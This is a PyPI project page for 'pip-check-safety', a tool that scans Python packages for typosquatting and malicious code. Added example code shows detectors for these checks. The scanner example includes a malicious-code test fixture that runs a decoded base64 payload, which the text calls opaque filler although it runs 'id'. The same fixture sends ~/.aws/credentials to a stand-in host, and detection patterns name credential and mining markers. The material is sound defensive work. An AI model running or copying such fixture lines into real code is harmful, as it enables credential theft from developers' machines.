Scan pip packages for security risks before and after installation
Project description
pip-check-safety
Scan pip packages for security risks before and after installation.
Features
- Pre-installation checks: Scan packages before you install them
- Typosquatting detection: Catch packages trying to impersonate popular libraries
- Code scanning: Detect suspicious patterns like crypto miners, data exfiltration, obfuscation
- Environment audits: Scan all your installed packages at once
- Requirements scanning: Check your requirements.txt before deployment
Installation
pip install pip-check-safety
Usage
Check a package before installing
pip-check requests
Deep scan (downloads and analyzes source code)
pip-check --deep some-package
Audit all installed packages
pip-check --audit
Check a requirements file
pip-check -r requirements.txt
JSON output for CI/CD
pip-check --json requests
pip-check --audit --json
What it checks
PyPI Metadata
- Package age (brand new packages are higher risk)
- Download count (low downloads = less community vetting)
- Author information
- Source repository presence
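As an added example (my own code, not part of pip-check-safety), this is how the metadata signals above can be computed from the PyPI JSON API response for a project (https://pypi.org/pypi/<name>/json). Download counts are not included in that response (they come from pypistats or the BigQuery dataset), so the function takes them as an argument. The sample dicts, the thresholds (30/180 days, 1000 downloads) and the repository host list are constructed for illustration.

```python
import json
from datetime import datetime, timezone
from urllib.request import urlopen

PYPI_JSON = "https://pypi.org/pypi/{name}/json"
# Hosts whose presence in project_urls/home_page we accept as "has a source repo" (assumed list)
REPO_HOSTS = ("github.com", "gitlab.com", "bitbucket.org", "codeberg.org", "sr.ht")


def fetch_pypi_json(name):
    """Live lookup of a project's metadata (not used by the offline samples below)."""
    with urlopen(PYPI_JSON.format(name=name), timeout=10) as resp:
        return json.load(resp)


def first_upload(data):
    """Earliest upload time across all releases, or None if the project has no files."""
    stamps = [f["upload_time_iso_8601"]
              for files in data.get("releases", {}).values() for f in files]
    if not stamps:
        return None
    return min(datetime.fromisoformat(s.replace("Z", "+00:00")) for s in stamps)


def assess_metadata(data, monthly_downloads=None, now=None):
    """Return (signal, severity) pairs; thresholds are illustrative, not the project's."""
    now = now or datetime.now(timezone.utc)
    info = data.get("info") or {}
    findings = []
    created = first_upload(data)
    if created is None:
        findings.append(("no_release_files", "high"))
    else:
        age_days = (now - created).days
        if age_days < 30:
            findings.append(("package_age_under_30d", "high"))
        elif age_days < 180:
            findings.append(("package_age_under_180d", "medium"))
    # Download counts are not part of the JSON API; pass them in from pypistats or BigQuery.
    if monthly_downloads is not None and monthly_downloads < 1000:
        findings.append(("low_downloads", "medium"))
    if not (info.get("author") or info.get("author_email") or info.get("maintainer")):
        findings.append(("no_author_info", "low"))
    urls = dict(info.get("project_urls") or {})
    if info.get("home_page"):
        urls["Homepage"] = info["home_page"]
    if not any(host in (u or "") for u in urls.values() for host in REPO_HOSTS):
        findings.append(("no_source_repo", "medium"))
    return findings


# Constructed samples shaped like the real API response (only the fields read above).
SAMPLE_NEW = {
    "info": {"name": "examplepkg", "author": "", "author_email": "", "maintainer": "",
             "home_page": "", "project_urls": None},
    "releases": {"0.1.0": [{"upload_time_iso_8601": "2024-06-01T10:00:00.000000Z"}]},
}
SAMPLE_MATURE = {
    "info": {"name": "examplelib", "author": "Jane Doe", "author_email": "jane@example.com",
             "home_page": "", "project_urls": {"Source": "https://github.com/example/examplelib"}},
    "releases": {"1.0.0": [{"upload_time_iso_8601": "2019-03-04T10:00:00.000000Z"}],
                 "1.1.0": [{"upload_time_iso_8601": "2021-01-01T00:00:00.000000Z"}]},
}
NOW = datetime(2024, 6, 10, tzinfo=timezone.utc)  # fixed clock so the samples are reproducible
```

Passing `now` explicitly keeps the age check deterministic in tests; in production call `assess_metadata(fetch_pypi_json("somepkg"), monthly_downloads=...)` and let it use the current time.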
Typosquatting
- Levenshtein distance to popular packages
- Common character swaps (0/o, 1/l, rn/m)
- Hyphen/underscore variations
- Suspicious suffixes (-official, -secure, etc.)
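Added example, not the project's own detector: a minimal implementation of the four heuristics above against a constructed list of popular names (a real tool would load the top-N projects by download count). Names are compared after PEP 503 normalization, because pip already treats `Requests`, `requests` and `python_dateutil`/`python-dateutil` as the same project, so those spellings are not squats; the "hyphen/underscore variation" check therefore looks for names that differ only by dropping or inserting a separator. The confusable map, suffix list and distance thresholds are my own choices.

```python
import re

# Constructed sample of "popular" names (assumption; not the project's list).
POPULAR = ["requests", "urllib3", "numpy", "pandas", "django", "flask", "boto3",
           "python-dateutil", "pyyaml", "cryptography", "setuptools", "pillow"]
# Visually confusable substitutions: what an attacker types -> what a reader sees
CONFUSABLES = {"0": "o", "1": "l", "rn": "m", "vv": "w"}
SUSPICIOUS_SUFFIXES = ("-official", "-secure", "-safe", "-utils", "-dev", "-py3", "-v2")


def normalize(name):
    """PEP 503 normalization: case-insensitive; any run of '-', '_' or '.' becomes one '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a, b):
    """Plain edit distance (insert/delete/substitute); a transposition counts as 2."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def deconfuse(name):
    """Rewrite confusable sequences to the character they imitate."""
    for bad, good in CONFUSABLES.items():
        name = name.replace(bad, good)
    return name


def check_typosquat(name, popular=POPULAR):
    """Return a list of (rule, impersonated_package) findings; [] means no match."""
    n = normalize(name)
    pop = {normalize(p): p for p in popular}
    if n in pop:
        return []  # it *is* the popular package: pip resolves these spellings to the same project
    findings = []
    # 1. popular name plus a trust-implying suffix ("requests-official")
    for suf in SUSPICIOUS_SUFFIXES:
        if n.endswith(suf) and n[:-len(suf)] in pop:
            findings.append(("suspicious_suffix", pop[n[:-len(suf)]]))
    # 2. confusable characters ("nurnpy" reads as "numpy")
    d = deconfuse(n)
    if d != n and d in pop:
        findings.append(("confusable_chars", pop[d]))
    # 3. separator dropped or inserted ("py-yaml" vs "pyyaml", "pythondateutil")
    joined = {k.replace("-", ""): v for k, v in pop.items()}
    if n.replace("-", "") in joined:
        findings.append(("separator_variant", joined[n.replace("-", "")]))
    # 4. small edit distance; tighter threshold for short names to limit false positives
    for cand, orig in pop.items():
        dist = levenshtein(n, cand)
        if 0 < dist <= (1 if len(cand) < 6 else 2):
            findings.append(("levenshtein", orig))
    return findings
```

A name can trip several rules at once (`py-yaml` is both a separator variant of and within edit distance of `pyyaml`); a scoring layer would de-duplicate by target package rather than by rule.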
Code Patterns (deep scan)
- Dynamic code execution (exec, eval)
- Network exfiltration (socket connections, HTTP requests)
- Obfuscation (base64, marshal, ROT encoding)
- System access (subprocess, os.system)
- Credential theft patterns
- Crypto mining indicators
- Persistence mechanisms
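Added example, not the project's scanner: an `ast`-based pass over Python source that resolves import aliases (so `sp.run` is recognised as `subprocess.run` and a bare `urlopen` as `urllib.request.urlopen`), flags the call and string-constant patterns listed above, escalates `exec`/`eval` whose argument is a decoded payload (the classic `exec(base64.b64decode(...))`) to critical, and maps the result onto the 0..3 scale the Exit Codes section uses. The call table, string markers, severities and the two sample sources are my own choices; the base64-looking constant in the sample is opaque filler that is never decoded or executed.

```python
import ast
import re

# Resolved dotted call name -> (category, severity). Assumed table, not the project's.
SUSPICIOUS_CALLS = {
    "exec": ("dynamic_exec", "high"), "eval": ("dynamic_exec", "high"),
    "__import__": ("dynamic_exec", "medium"),
    "os.system": ("system_access", "high"), "os.popen": ("system_access", "high"),
    "subprocess.run": ("system_access", "medium"), "subprocess.Popen": ("system_access", "medium"),
    "subprocess.check_output": ("system_access", "medium"),
    "base64.b64decode": ("obfuscation", "medium"), "marshal.loads": ("obfuscation", "high"),
    "codecs.decode": ("obfuscation", "low"), "zlib.decompress": ("obfuscation", "low"),
    "socket.socket": ("network", "medium"), "urllib.request.urlopen": ("network", "medium"),
    "requests.get": ("network", "medium"), "requests.post": ("network", "medium"),
}
DECODERS = {k for k, (cat, _) in SUSPICIOUS_CALLS.items() if cat == "obfuscation"}
# String constants worth flagging: (category, severity, pattern)
STRING_MARKERS = [
    ("credential_access", "high", re.compile(r"\.aws/credentials|\.ssh/id_|\.pypirc|\.npmrc|AWS_SECRET_ACCESS_KEY")),
    ("crypto_mining", "high", re.compile(r"stratum\+tcp://|xmrig|minerd", re.I)),
    ("persistence", "medium", re.compile(r"\.bashrc|\.profile|crontab|/etc/rc\.local|systemd/system|CurrentVersion\\Run")),
    ("obfuscation", "low", re.compile(r"^[A-Za-z0-9+/=]{80,}$")),  # long base64-looking blob
]
SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2, "critical": 3}


def _aliases(tree):
    """Map local names to what they import, so `sp.run` resolves to subprocess.run."""
    out = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                top = a.name.split(".")[0]          # `import urllib.request` binds `urllib`
                out[a.asname or top] = a.name if a.asname else top
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            for a in node.names:
                out[a.asname or a.name] = f"{node.module}.{a.name}"
    return out


def _dotted(node, aliases):
    """Turn an `a.b.c` attribute chain into 'A.b.c' with the alias resolved; None otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def _feeds_decoder(call, aliases):
    """True if a decoder call (base64/marshal/...) appears anywhere inside this call."""
    return any(sub is not call and isinstance(sub, ast.Call)
               and _dotted(sub.func, aliases) in DECODERS for sub in ast.walk(call))


def scan_source(src, filename="<string>"):
    """Return findings as dicts with line, category, severity and detail."""
    try:
        tree = ast.parse(src, filename)
    except SyntaxError as e:  # e.g. Python 2 code: report it rather than silently saying "clean"
        return [{"line": e.lineno or 0, "category": "unparseable", "severity": "low", "detail": str(e)}]
    aliases = _aliases(tree)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func, aliases)
            if name in SUSPICIOUS_CALLS:
                cat, sev = SUSPICIOUS_CALLS[name]
                if cat == "dynamic_exec" and _feeds_decoder(node, aliases):
                    cat, sev = "dynamic_exec_of_decoded_payload", "critical"
                findings.append({"line": node.lineno, "category": cat, "severity": sev, "detail": name})
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for cat, sev, rx in STRING_MARKERS:
                if rx.search(node.value):
                    findings.append({"line": node.lineno, "category": cat, "severity": sev,
                                     "detail": node.value[:40]})
    return findings


def risk_level(findings):
    """Collapse findings onto the 0..3 exit-code scale (low-only findings count as 0)."""
    return max((SEVERITY_RANK[f["severity"]] for f in findings), default=0)


# Constructed samples. The PAYLOAD constant is opaque filler; nothing here is decoded or run.
SAMPLE_MALICIOUS = '''
import base64, os
import subprocess as sp
from urllib.request import urlopen
PAYLOAD = "aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2lkJyk="
exec(base64.b64decode(PAYLOAD))
sp.run(["curl", "http://example.invalid/x"])
with open(os.path.expanduser("~/.aws/credentials")) as f:
    urlopen("http://example.invalid/c", data=f.read().encode())
'''
SAMPLE_BENIGN = '''
import json
def load(path):
    with open(path) as f:
        return json.load(f)
'''
```

Run `scan_source(SAMPLE_MALICIOUS)` and the exec line comes back as critical, the `sp.run` and `urlopen` lines as medium, and the `.aws/credentials` string as high, so `risk_level` is 3; the benign sample yields no findings. Two caveats a deployment needs: a static pass only sees code that is literally in the tree (a string assembled at run time and passed to `exec` is flagged only because of `exec` itself), and `setup.py` runs at install time, so scanning must happen before `pip install` executes it.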
Exit Codes
- 0: No issues, or low-risk findings only
- 1: Medium-risk findings
- 2: High-risk findings
- 3: Critical-risk findings
Use the exit code in CI/CD pipelines; a status of 2 or higher means high or critical findings:
pip-check --audit
if [ $? -ge 2 ]; then
echo "High-risk packages detected!"
exit 1
fi
Python API
from pip_check import PyPIChecker, TyposquatDetector, CodeScanner, EnvironmentAuditor
# Check a single package
checker = PyPIChecker()
report = checker.check("requests")
report.print_report()
# Detect typosquatting
detector = TyposquatDetector()
report = detector.check("reqeusts") # typo
print(report.findings)
# Scan installed package code
scanner = CodeScanner()
report = scanner.scan_installed("some-package")
# Audit entire environment
auditor = EnvironmentAuditor(deep_scan=True)
reports = auditor.audit_all()
auditor.print_summary(reports)
License
MIT
Download files
Source Distribution
pip_check_safety-1.0.0.tar.gz (15.2 kB)
Built Distribution
pip_check_safety-1.0.0-py3-none-any.whl (16.6 kB)
File details
Details for the file pip_check_safety-1.0.0.tar.gz.
File metadata
- Download URL: pip_check_safety-1.0.0.tar.gz
- Upload date:
- Size: 15.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.12.3
File hashes
| Algorithm | Hash digest |
|---|---|
| SHA256 | 242107bfbf73d17f25cdb963896bd45806b4baeba6375b382cedf775902470e9 |
| MD5 | 851c1f80be5dc0ad7fbcd4cfe1338945 |
| BLAKE2b-256 | e1a7a11322bc118f6d703fd87af7999022829c15ca0762c9f696b3a99ef45b69 |
File details
Details for the file pip_check_safety-1.0.0-py3-none-any.whl.
File metadata
- Download URL: pip_check_safety-1.0.0-py3-none-any.whl
- Upload date:
- Size: 16.6 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.12.3
File hashes
| Algorithm | Hash digest |
|---|---|
| SHA256 | 1093b80107386d1729e6425cf4db1b317d37b6e9c88a7bb623e613eafd510d23 |
| MD5 | b08174fc5a00478fd5c1f5d046c00573 |
| BLAKE2b-256 | d0e28459a6bbff93e0adc77b9f30358cddd60d2e7e3308f36645406ee3ba5c3b |